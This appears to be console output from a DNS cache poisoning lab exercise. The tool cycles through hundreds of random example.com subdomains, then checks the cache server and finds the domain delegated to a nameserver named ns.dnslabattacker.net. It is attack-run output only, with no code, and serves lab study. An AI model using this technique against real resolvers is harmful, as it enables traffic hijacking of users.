INFO: change new name: tbLye.example.com.
INFO: change new name: tb6le.example.com.
INFO: change new name: tbPle.example.com.
INFO: change new name: tbfle.example.com.
INFO: change new name: wbf6e.example.com.
INFO: change new name: wbe6e.example.com.
INFO: change new name: wneke.example.com.
INFO: change new name: wnYke.example.com.
INFO: change new name: 4nGke.example.com.
INFO: change new name: 4OGwe.example.com.
INFO: change new name: pOGde.example.com.
INFO: change new name: p4qde.example.com.
INFO: change new name: p4Ode.example.com.
INFO: change new name: p4Lde.example.com.
INFO: change new name: p4bxe.example.com.
INFO: change new name: b4bEe.example.com.
INFO: change new name: bPb2e.example.com.
INFO: change new name: bPkGe.example.com.
INFO: change new name: 1Pkne.example.com.
INFO: change new name: 1PPne.example.com.
INFO: change new name: 1I2ne.example.com.
INFO: change new name: 1Ilne.example.com.
INFO: change new name: 1qpne.example.com.
INFO: change new name: 1qgNe.example.com.
INFO: change new name: 11PNe.example.com.
INFO: change new name: 1hZNe.example.com.
INFO: change new name: 1h9Ne.example.com.
INFO: change new name: 1h5Ne.example.com.
INFO: change new name: 1hzFe.example.com.
INFO: change new name: 1vcFe.example.com.
INFO: change new name: Evc1e.example.com.
INFO: change new name: qv71e.example.com.
INFO: change new name: LvH1e.example.com.
INFO: change new name: Lv0fe.example.com.
INFO: change new name: Sv0ne.example.com.
INFO: change new name: SvUne.example.com.
INFO: change new name: SvFne.example.com.
INFO: change new name: Svmve.example.com.
INFO: change new name: SsmMe.example.com.
INFO: change new name: LsHMe.example.com.
INFO: change new name: nszMe.example.com.
INFO: change new name: nsbie.example.com.
INFO: change new name: nsNie.example.com.
INFO: change new name: nsxie.example.com.
INFO: change new name: 1sxke.example.com.
INFO: change new name: 1gTke.example.com.
INFO: change new name: DgTCe.example.com.
INFO: change new name: DweCe.example.com.
INFO: change new name: DmeHe.example.com.
INFO: change new name: Dm1He.example.com.
INFO: change new name: DmWHe.example.com.
INFO: change new name: DvWHe.example.com.
INFO: change new name: Dv0He.example.com.
INFO: change new name: DvhHe.example.com.
INFO: change new name: DvLJe.example.com.
INFO: change new name: DvI7e.example.com.
INFO: change new name: DyIme.example.com.
INFO: change new name: zyIae.example.com.
INFO: change new name: zqI3e.example.com.
INFO: change new name: zOT3e.example.com.
INFO: change new name: zZ23e.example.com.
INFO: change new name: 3Z2De.example.com.
INFO: change new name: 3N2ae.example.com.
INFO: change new name: 3Jsae.example.com.
INFO: change new name: TJbae.example.com.
INFO: change new name: PJBae.example.com.
INFO: change new name: PJD8e.example.com.
INFO: change new name: Ppu8e.example.com.
INFO: change new name: PFuYe.example.com.
INFO: change new name: mF2Ye.example.com.
INFO: change new name: mFrFe.example.com.
INFO: change new name: CFTFe.example.com.
INFO: change new name: cFTqe.example.com.
INFO: change new name: cF25e.example.com.
INFO: change new name: mF28e.example.com.
INFO: change new name: mk25e.example.com.
INFO: change new name: mkg5e.example.com.
INFO: change new name: m4M5e.example.com.
INFO: change new name: J485e.example.com.
INFO: change new name: J7h5e.example.com.
INFO: change new name: J7L5e.example.com.
INFO: change new name: J7e4e.example.com.
INFO: change new name: t754e.example.com.
INFO: change new name: u75de.example.com.
INFO: change new name: r7sde.example.com.
INFO: change new name: q7zde.example.com.
INFO: change new name: q7Vde.example.com.
INFO: change new name: 67cde.example.com.
INFO: change new name: 6wAde.example.com.
INFO: change new name: Jwvde.example.com.
INFO: change new name: dwvve.example.com.
INFO: change new name: dwIve.example.com.
INFO: change new name: AwIhe.example.com.
INFO: change new name: 7wxhe.example.com.
INFO: change new name: 7Aahe.example.com.
INFO: change new name: IAzhe.example.com.
INFO: change new name: Imhhe.example.com.
INFO: change new name: sm6he.example.com.
INFO: change new name: smKhe.example.com.
INFO: change new name: sAOhe.example.com.
INFO: change new name: sAnJe.example.com.
INFO: change new name: sBnie.example.com.
INFO: change new name: tBnve.example.com.
INFO: change new name: HBcve.example.com.
INFO: change new name: HBGwe.example.com.
INFO: change new name: HBKwe.example.com.
INFO: change new name: HXKre.example.com.
INFO: change new name: HXqqe.example.com.
INFO: change new name: HXaze.example.com.
INFO: change new name: 8X5ze.example.com.
INFO: change new name: 8d5Ve.example.com.
INFO: change new name: 8duPe.example.com.
INFO: change new name: mdfPe.example.com.
INFO: change new name: RdKPe.example.com.
INFO: change new name: RbKke.example.com.
INFO: change new name: hbK3e.example.com.
INFO: change new name: 3bKwe.example.com.
INFO: change new name: 3bgDe.example.com.
INFO: change new name: 3b57e.example.com.
INFO: change new name: 3Kd7e.example.com.
INFO: change new name: 3Kd7e.example.com.
INFO: change new name: 3Oe7e.example.com.
INFO: change new name: 3OA7e.example.com.
INFO: change new name: 3w07e.example.com.
INFO: change new name: aw0Se.example.com.
INFO: change new name: Zw0Be.example.com.
INFO: change new name: ZwEBe.example.com.
INFO: change new name: 7wEVe.example.com.
INFO: change new name: 7w3ke.example.com.
INFO: change new name: vw3Pe.example.com.
INFO: change new name: vv3ze.example.com.
INFO: change new name: vvIze.example.com.
INFO: change new name: vvQTe.example.com.
INFO: change new name: vJQoe.example.com.
INFO: change new name: CJ6oe.example.com.
INFO: change new name: CJtoe.example.com.
INFO: change new name: CJ8oe.example.com.
INFO: change new name: C3Ooe.example.com.
INFO: change new name: CLpoe.example.com.
INFO: change new name: CLVoe.example.com.
INFO: change new name: KLVCe.example.com.
INFO: change new name: K0uCe.example.com.
INFO: change new name: K0RCe.example.com.
INFO: change new name: KgRae.example.com.
INFO: change new name: KgWae.example.com.
INFO: change new name: K8W5e.example.com.
INFO: change new name: T8l5e.example.com.
INFO: change new name: 3875e.example.com.
INFO: change new name: 38t5e.example.com.
INFO: change new name: 3QC5e.example.com.
INFO: change new name: ZQQ5e.example.com.
INFO: change new name: ZJb5e.example.com.
INFO: change new name: ZJs5e.example.com.
INFO: change new name: Zss2e.example.com.
INFO: change new name: ZssCe.example.com.
INFO: change new name: ZWshe.example.com.
INFO: change new name: ZHsUe.example.com.
INFO: change new name: ZHgEe.example.com.
INFO: change new name: AHgye.example.com.
INFO: change new name: AXgCe.example.com.
INFO: change new name: yXCCe.example.com.
INFO: change new name: yX7Ce.example.com.
INFO: change new name: yHhCe.example.com.
INFO: change new name: CHhie.example.com.
INFO: change new name: CH6se.example.com.
INFO: change new name: CKmse.example.com.
INFO: change new name: CyAse.example.com.
INFO: change new name: Cywse.example.com.
INFO: change new name: CyEse.example.com.
INFO: change new name: Iy3se.example.com.
INFO: change new name: ID3ve.example.com.
INFO: change new name: 9Dhve.example.com.
INFO: change new name: 9DQve.example.com.
INFO: change new name: 9nsve.example.com.
INFO: change new name: 9nRMe.example.com.
INFO: change new name: 9mRpe.example.com.
INFO: change new name: 9kRNe.example.com.
INFO: change new name: 9uLNe.example.com.
INFO: change new name: 91Lue.example.com.
INFO: change new name: m1LAe.example.com.
INFO: change new name: m1Ehe.example.com.
INFO: change new name: B1she.example.com.
INFO: change new name: V1sce.example.com.
INFO: change new name: VWLce.example.com.
INFO: change new name: VWjce.example.com.
INFO: change new name: V5jYe.example.com.
INFO: change new name: VSJYe.example.com.
INFO: change new name: VSDYe.example.com.
INFO: change new name: LSvYe.example.com.
INFO: change new name: L9rYe.example.com.
INFO: change new name: L42Ye.example.com.
INFO: change new name: p4CYe.example.com.
INFO: change new name: p4Che.example.com.
INFO: change new name: pfCje.example.com.
INFO: change new name: FfC7e.example.com.
INFO: change new name: afCze.example.com.
INFO: change new name: af6Me.example.com.
INFO: change new name: Df6fe.example.com.
INFO: change new name: DfCfe.example.com.
INFO: change new name: D4kfe.example.com.
INFO: change new name: DROfe.example.com.
INFO: change new name: WRO8e.example.com.
INFO: change new name: WRG8e.example.com.
INFO: change new name: 6RGce.example.com.
INFO: change new name: KR5ce.example.com.
INFO: change new name: KRice.example.com.
INFO: change new name: KRxPe.example.com.
INFO: change new name: 2Rxoe.example.com.
INFO: change new name: uRDoe.example.com.
INFO: change new name: urIoe.example.com.
INFO: change new name: urQwe.example.com.
INFO: change new name: 0rHwe.example.com.
INFO: change new name: 0WHve.example.com.
INFO: change new name: HWwve.example.com.
INFO: change new name: nWZve.example.com.
INFO: change new name: SWfve.example.com.
INFO: change new name: SqfFe.example.com.
INFO: change new name: SFfre.example.com.
INFO: change new name: S3fVe.example.com.
INFO: change new name: Swfhe.example.com.
INFO: change new name: uwmhe.example.com.
INFO: change new name: uWmle.example.com.
INFO: change new name: uWule.example.com.
INFO: change new name: uWDle.example.com.
INFO: change new name: uXPle.example.com.
INFO: change new name: bXale.example.com.
INFO: change new name: jXaVe.example.com.
INFO: change new name: j8aae.example.com.
INFO: change new name: R8Sae.example.com.
INFO: change new name: P8SDe.example.com.
INFO: change new name: P8upe.example.com.
INFO: change new name: P86pe.example.com.
INFO: change new name: Z89pe.example.com.
INFO: change new name: Z80We.example.com.
INFO: change new name: X80Ye.example.com.
INFO: change new name: Z8LYe.example.com.
INFO: change new name: 08EYe.example.com.
INFO: change new name: D8VYe.example.com.
INFO: change new name: DzVte.example.com.
INFO: change new name: DzUke.example.com.
INFO: change new name: DzWme.example.com.
INFO: change new name: Lzume.example.com.
INFO: change new name: Lcume.example.com.
INFO: change new name: L3uje.example.com.
INFO: change new name: h3uRe.example.com.
INFO: change new name: e3VRe.example.com.
INFO: change new name: ebVue.example.com.
INFO: change new name: eAVSe.example.com.
INFO: change new name: eWcSe.example.com.
INFO: change new name: eWffe.example.com.
INFO: change new name: eW9me.example.com.
INFO: change new name: tW9ee.example.com.
INFO: change new name: tWFee.example.com.
INFO: change new name: tHmee.example.com.
INFO: change new name: tHgee.example.com.
INFO: change new name: tXg1e.example.com.
INFO: change new name: tXo1e.example.com.
INFO: change new name: wXk1e.example.com.
[37m[😊 INFO Sun Oct 25 12:10:19 2020 ]: Will Check if the cache server has been attacked!
1603627819.example.com A 10.245.146.74 53 500000
[37m[😊 INFO Sun Oct 25 12:10:19 2020 ]: QUERY 1603627819.example.com's A Record, Server: 10.245.146.74
[37m[😊 INFO Sun Oct 25 12:10:19 2020 ]: RESPONSE Received From 10.245.146.74
[37m[😊 INFO Sun Oct 25 12:10:19 2020 ]: SHOW MESSAGE
====================<<=DNS=MESSAGE=INFO=>>====================
FLAGS: 0x8180, QUESTIONS: 0x1, ANSWERS: 1, AUTH: 1, ADDI: 1
===========================ANSWERS============================
1603627819.example.com 	 1 	 1 	 259200	 10.245.146.73	
=============================AUTH=============================
example.com 	 2 	 1 	 13	 ns.dnslabattacker.net	
=============================ADDI=============================
ns.dnslabattacker.net 	 1 	 1 	 604800	 10.245.146.73	

[37m[😊 INFO Sun Oct 25 12:10:19 2020 ]: Write Over!
